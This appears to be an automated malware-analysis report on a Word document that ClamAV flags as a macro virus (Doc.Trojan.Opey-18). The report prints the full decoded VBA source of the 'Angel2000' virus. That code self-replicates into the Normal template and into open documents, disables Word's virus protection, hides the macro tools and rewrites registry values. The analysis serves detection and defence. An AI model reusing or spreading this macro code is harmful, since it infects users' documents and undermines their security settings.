MALICIOUS
188
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample is identified as a malicious document by ClamAV with the signature Doc.Trojan.Opey-18. It contains legacy WordBasic macro virus markers and VBA macros, including an AutoOpen subroutine, which are commonly used to execute malicious code when the document is opened. The VBA script attempts to copy itself and potentially execute further malicious actions.
Heuristics 5
-
ClamAV: Doc.Trojan.Opey-18 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Opey-18
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
DocOpen.VBProject.VBComponents(2).CodeModule.InsertLines 1, vircode -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4907 bytes |
SHA-256: 80acec549a23d3a42782d621e6b1c1c110eddb34fb44bf94f40a591005ab084f |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Angel2000"
Attribute VB_Name = "Angel20001"
Sub AutoExec()
On Error Resume Next
Call clascopy
If Month(Date) = 12 Then
Application.Quit
End If
End Sub
Sub AutoOpen()
On Error Resume Next
Call clascopy
End Sub
Sub FileClose()
On Error Resume Next
Call clascopy
If ActiveDocument.Saved = False Then ActiveDocument.Save
ActiveDocument.Close
End Sub
Sub FileExit()
On Error Resume Next
Call clascopy
If ActiveDocument.Saved = False Then ActiveDocument.Save
Application.Quit
End Sub
Sub FileNew()
On Error Resume Next
Dialogs(wdDialogFileNew).Show
Call clascopy
End Sub
Sub FileOpen()
On Error Resume Next
Dialogs(wdDialogFileOpen).Show
Call clascopy
End Sub
Sub FilePageSetup()
On Error Resume Next
Call clascopy
Dialogs(wdDialogFilePageSetup).Show
End Sub
Sub FilePrint()
On Error Resume Next
Call clascopy
Dialogs(wdDialogFilePrint).Show
End Sub
Sub FileSave()
On Error Resume Next
Call clascopy
ActiveDocument.Save
End Sub
Sub FileSaveAs()
On Error Resume Next
Call clascopy
Dialogs(wdDialogFileSaveAs).Show
End Sub
Sub clascopy()
On Error Resume Next
Call stealth
NInfected = False
For A_A = NormalTemplate.VBProject.VBComponents.Count To 1 Step -1
modname = NormalTemplate.VBProject.VBComponents(A_A).Name
If modname = "Angel2000" Then NInfected = True
If (modname <> "Angel2000") And (modname <> "ThisDocument") Then Application.OrganizerDelete Source:=NormalTemplate.FullName, Name:=modname, Object:=wdOrganizerObjectProjectItems
Next A_A
For Each DocOpen In Documents
DInfected = False
With DocOpen
For B_B = DocOpen.VBProject.VBComponents.Count To 1 Step -1
modname = DocOpen.VBProject.VBComponents(B_B).Name
If modname = "Angel2000" Then DInfected = True
If (modname <> "Angel2000") And (modname <> "ThisDocument") And (modname <> "Reference to Normal") Then Application.OrganizerDelete Source:=DocOpen.FullName, Name:=modname, Object:=wdOrganizerObjectProjectItems
Next B_B
If DInfected = False Then
e = NormalTemplate.VBProject.VBComponents(2).CodeModule.CountOfLines
vircode = NormalTemplate.VBProject.VBComponents(2).CodeModule.Lines(1, e)
DocOpen.VBProject.VBComponents.Add(1).Name = "Angel2000"
DocOpen.VBProject.VBComponents(2).CodeModule.InsertLines 1, vircode
'DocOpen.SaveAs FileName:=DocOpen.FullName
End If
End With
Next DocOpen
If NInfected = False Then
e = ActiveDocument.VBProject.VBComponents(2).CodeModule.CountOfLines
vircode = ActiveDocument.VBProject.VBComponents(2).CodeModule.Lines(1, e)
NormalTemplate.VBProject.VBComponents.Add(1).Name = "Angel2000"
NormalTemplate.VBProject.VBComponents(2).CodeModule.InsertLines 1, vircode
NormalTemplate.Save
End If
End Sub
Sub stealth()
On Error Resume Next
Options.ConfirmConversions = False
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Options.SavePropertiesPrompt = False
ActiveDocument.ReadOnlyRecommended = False
On Error Resume Next
CommandBars("Visual Basic").Visible = False
CommandBars("Visual Basic").Enabled = False
CommandBars("Visual Basic").Protection = msoBarNoChangeVisible
CommandBars("Visual Basic").Protection = msoBarNoCustomize
CommandBars("Tools").Controls("Macro").Delete
CommandBars("Tools").Controls("Customize...").Delete
CustomizationContext = NormalTemplate
FindKey(BuildKeyCode(wdKeyF8, wdKeyAlt)).Disable
FindKey(BuildKeyCode(wdKeyF11, wdKeyAlt)).Disable
With Dialogs(wdDialogFileSummaryInfo)
.Author = "SOFT Group. Copyright(c) 2000"
.Execute
End With
System.PrivateProfileString("", "HKEY_USERS\.Default\Software\Microsoft\Internet Explorer\Main", _
"Start Page") = "www.sti.edu.ph"
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\WINDOWS\CURRENTVERSION", _
"RegisteredOwner") = "Avenging Angel :)"
System.PrivateProfileString("", "HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0", "DisplayName") = _
"Infected with Angel Virus"
End Sub
Sub ToolsMacro()
End Sub
Sub ViewCode()
Call ToolsMacro
End Sub
Sub ViewVBCode()
Call ToolsMacro
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.